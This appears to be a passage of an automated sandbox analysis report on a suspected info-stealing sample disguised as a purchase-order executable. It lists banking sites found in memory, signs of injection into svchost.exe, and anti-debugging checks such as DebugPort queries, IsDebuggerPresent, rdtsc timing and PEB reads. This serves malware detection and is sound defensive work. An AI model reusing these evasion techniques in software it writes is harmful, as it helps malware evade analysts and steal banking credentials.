                Source: 72Z53078.4.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: 72Z53078.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 72Z53078.4.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 72Z53078.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 72Z53078.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\PO #2411071822.exe API call chain: ExitProcess graph end node graph_0-93704
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\pcaui.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02487983 LdrLoadDll, 2_2_02487983
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00436AAF BlockInput, 0_2_00436AAF
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_003E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_003E3D19
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00413920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00413920
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_003FE01E LoadLibraryA,GetProcAddress, 0_2_003FE01E
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00D794C0 mov eax, dword ptr fs:[00000030h] 0_2_00D794C0
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00D79460 mov eax, dword ptr fs:[00000030h] 0_2_00D79460
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00D77E10 mov eax, dword ptr fs:[00000030h] 0_2_00D77E10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h] 2_2_0310634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h] 2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h] 2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h] 2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h] 2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h] 2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310625D mov eax, dword ptr fs:[00000030h] 2_2_0310625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h] 2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h] 2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h] 2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h] 2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h] 2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h] 2_2_031062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h] 2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h] 2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h] 2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h] 2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h] 2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h] 2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h] 2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h] 2_2_03104164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h] 2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h] 2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
